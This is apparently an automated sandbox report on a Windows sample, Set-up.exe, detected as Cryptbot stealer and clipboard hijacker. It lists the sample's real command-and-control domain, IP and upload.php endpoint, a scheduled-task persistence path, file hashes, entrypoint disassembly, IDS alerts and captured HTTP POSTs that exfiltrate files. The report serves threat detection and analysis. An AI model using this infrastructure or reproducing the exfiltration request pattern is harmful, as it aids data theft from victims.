http://tventyvr20pt.top/v1/upload.php	Set-up.exe, 00000001.00000003.1511322357.000000000186A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1511093463.0000000001867000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://tventyvr20pt.top/v1/upload.phpX	Set-up.exe, 00000001.00000002.2100341753.0000000001867000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.244.181.140	tventyvr20pt.top	Russian Federation		44901	BELCLOUDBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525759
Start date and time:	2024-10-04 14:42:40 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 7300 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Simulations

Behavior and APIs

Time	Type	Description
08:43:54	API Interceptor	3x Sleep call for process: Set-up.exe modified
08:45:26	API Interceptor	338x Sleep call for process: service123.exe modified
14:44:54	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.244.181.140	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sixvv16pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvx13pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	forvc14pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fiftvx15pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sevtvx17pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	tventyvr20pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sixvv16pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	forvc14pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvx13pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	elevenvx11ht.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tventyvr20pt.top	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
s-part-0017.t-0009.t-msedge.net	https://test1web.edukati2.websku.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.45
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	13.107.246.45
	https://www.oferdigitaiscom.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Vidar	Browse	13.107.246.45
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
	http://wiki.hostmaster.chinametrogroup.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.thefirsthbcu.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	hJABTqngKoJnTgLh.ps1	Get hash	malicious	Unknown	Browse	13.107.246.45
	UwBqqeMnswLwstaa.ps1	Get hash	malicious	Unknown	Browse	13.107.246.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BELCLOUDBG	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.00234046682378051
Encrypted:	false
SSDEEP:	768:+WE9OaBxc0AJF8JAfPrYU3HcW534/lVBill7xbAOxuz/kQ:QxBxcEJAfPrYSHcW6/C5Buz7
MD5:	9B62814A6554664282F49BF19A2D734C
SHA1:	DE04A2420DA72FEFD067989A5E1FF20B063DD940
SHA-256:	0C424015BD305ECB6A88346299FE725B0E5CF0C52F49FF0EAB86960E0148F251
SHA-512:	E8806AD50FFF9B808DD364BF8D8680496923FD55F3FBE4A9161F5F48CEF52DE92E7108DB2564051A78EFF1B71112FDCB8BEE77598676B47F5DB60CB5338970C4
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............(.v........................@.......................... ......?.....@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\siNpVQuBSTLTLeNwdJHL.dll

Download File

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.054304440754360264
Encrypted:	false
SSDEEP:
MD5:	A8E9FA3CC2318170CB111B23320BAB78
SHA1:	43E4E6193CC9F7333C9B5F512A4F716311F9E725
SHA-256:	A4172256F15D7417B4541E3E901F5389815D923FB74FD4C71765D66ACB10D040
SHA-512:	530112E14DCDC161F5AA4657B31CC53FA418DF3AB43C7CE4532D3DDBB9EAE0518C2F8924E4C9E4E4ECFB00D2FAB2EE60A85EB05DE9DBDBCE0DC80AED321C8342
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........#...(...........................d.........................@.......z....@... .........................`.......................................Hz...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..Hz.......\|...J..............@..B................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.7772662119663822
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	9'964'544 bytes
MD5:	b13e354d435e1c6058a47f21c02d340d
SHA1:	27bf445af2cf41ecd8b63d6a4f69e0daec155070
SHA256:	69de589ce17aef3d2b265ef806d8783d882e53671542518d1379c7cbbf8f67d0
SHA512:	c4eb98283fa6464aadfe33c0c1b17243053a7d5b526a0fdc0755674190b96b753fee6c5e0104f6928d013741bd72eea4371fe0a1dbc38c3b16ad299c94eee927
SSDEEP:	49152:U1G09RgzuJvG124EDqbkXqayB7nh5uerH3HUktNdtaK6OjzYwAIp5a2GWPwibr7R:jYRZVZqwiB7
TLSH:	FAA6E762ED97D3EEE14708B8A00AB37F16349B04841DDA38DF41EBD1E73297CD4AA195
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f..f...............(..+...................,...@..........................p............@... .........................B..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66FF9466 [Fri Oct 4 07:08:22 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D3E070h], 00000001h
jmp 00007F484CB8A396h
nop
mov dword ptr [00D3E070h], 00000000h
jmp 00007F484CB8A386h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F484CB98A96h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D31000h
call dword ptr [00D4022Ch]
sub esp, 04h
test eax, eax
je 00007F484CB8A755h
mov ebx, eax
mov dword ptr [esp], 00D31000h
call dword ptr [00D4024Ch]
mov edi, dword ptr [00D40234h]
sub esp, 04h
mov dword ptr [00D3E028h], eax
mov dword ptr [esp+04h], 00D31013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D31029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C0004h], eax
test esi, esi
je 00007F484CB8A6F3h
mov dword ptr [esp+04h], 00D3E02Ch
mov dword ptr [esp], 00D3B104h
call esi
mov dword ptr [esp], 00401580h
call 00007F484CB8A643h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x93f000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x940000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x943000	0x43ec8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x939de4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94020c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2be338	0x2be400	434dbbac8f4c75ed28facff625f21d62	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c0000	0x670ec0	0x671000	76c988553b103a6e6663b0fc98117557	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x931000	0x9f14	0xa000	c19c39a7e1dcfff0054b8dd3f845b6b7	False	0.377685546875	data	4.422001265235105	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x93b000	0x21d8	0x2200	b76c0fae5fde6da0c2ee450c02fe3da3	False	0.3254825367647059	data	4.860196577034504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x93e000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x93f000	0x42	0x200	3ef9ea5b179a856d2a67b8ee5da91200	False	0.123046875	data	0.7233135926899718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x940000	0xa98	0xc00	6e9b57f54914dcc21b52a6758e9d00de	False	0.380859375	data	4.649211114602038	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x941000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x942000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x943000	0x43ec8	0x44000	5853fd8812bb3acd3ae0ce8781e585d5	False	0.19287109375	data	6.778460339476832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5aaa50

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T14:43:54.751804+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.10	49819	185.244.181.140	80	TCP
2024-10-04T14:43:59.110535+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.10	49854	185.244.181.140	80	TCP
2024-10-04T14:44:04.010705+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.10	49880	185.244.181.140	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 14:43:54.052854061 CEST	49819	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:54.057636976 CEST	80	49819	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:54.057703018 CEST	49819	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:54.058492899 CEST	49819	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:54.058492899 CEST	49819	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:54.063303947 CEST	80	49819	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:54.063318968 CEST	80	49819	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:54.751039982 CEST	80	49819	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:54.751749992 CEST	80	49819	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:54.751804113 CEST	49819	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:54.751804113 CEST	49819	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:54.769685984 CEST	80	49819	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.047378063 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.052782059 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.052855968 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.053026915 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.053100109 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.060987949 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061044931 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.061119080 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061130047 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061183929 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.061333895 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061342001 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061346054 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061355114 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061414957 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.061441898 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061448097 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.061451912 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061460018 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.061481953 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.061501980 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.068614960 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.068629980 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.068639040 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.068722010 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.069808960 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.069849014 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.069880962 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.069901943 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.069962978 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.070091963 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.110419035 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.110534906 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.166361094 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.530116081 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.989101887 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.989245892 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.989269972 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:43:59.989345074 CEST	49854	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:43:59.997843027 CEST	80	49854	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.183878899 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.189090967 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.191310883 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.191478014 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.191543102 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.196374893 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196393967 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196430922 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.196469069 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.196506977 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196520090 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196541071 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196557999 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196568966 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196578026 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.196618080 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196618080 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.196630955 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196654081 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.196681023 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:03.201565981 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.201580048 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.201620102 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.201630116 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.201718092 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.201726913 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:03.246409893 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:04.010476112 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:04.010672092 CEST	80	49880	185.244.181.140	192.168.2.10
Oct 4, 2024 14:44:04.010704994 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:04.010742903 CEST	49880	80	192.168.2.10	185.244.181.140
Oct 4, 2024 14:44:04.021296024 CEST	80	49880	185.244.181.140	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 14:43:53.459649086 CEST	52377	53	192.168.2.10	1.1.1.1
Oct 4, 2024 14:43:54.047105074 CEST	53	52377	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 14:43:53.459649086 CEST	192.168.2.10	1.1.1.1	0xdefb	Standard query (0)	tventyvr20pt.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 14:43:34.857925892 CEST	1.1.1.1	192.168.2.10	0x9bd6	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 4, 2024 14:43:34.857925892 CEST	1.1.1.1	192.168.2.10	0x9bd6	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Oct 4, 2024 14:43:54.047105074 CEST	1.1.1.1	192.168.2.10	0xdefb	No error (0)	tventyvr20pt.top		185.244.181.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tventyvr20pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49819	185.244.181.140	80	7300	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:43:54.058492899 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary61629611 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 410 Host: tventyvr20pt.top
Oct 4, 2024 14:43:54.058492899 CEST	410	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 31 36 32 39 36 31 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 71 Data Ascii: ------Boundary61629611Content-Disposition: form-data; name="file"; filename="Leqaro.bin"Content-Type: application/octet-stream$zk$[lYBJ9~7&qg>tk80yu7pB)~)7KM.'"*D;!m8m
Oct 4, 2024 14:43:54.751039982 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Fri, 04 Oct 2024 12:43:54 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49854	185.244.181.140	80	7300	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 4, 2024 14:43:59.053026915 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary88671164 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 76606 Host: tventyvr20pt.top
Oct 4, 2024 14:43:59.053100109 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 38 36 37 31 31 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 44 61 62 Data Ascii: ------Boundary88671164Content-Disposition: form-data; name="file"; filename="Dabohi.bin"Content-Type: application/octet-stream%,LzUi aZer8;eG]Li+l&~Q(;(ERkP@52
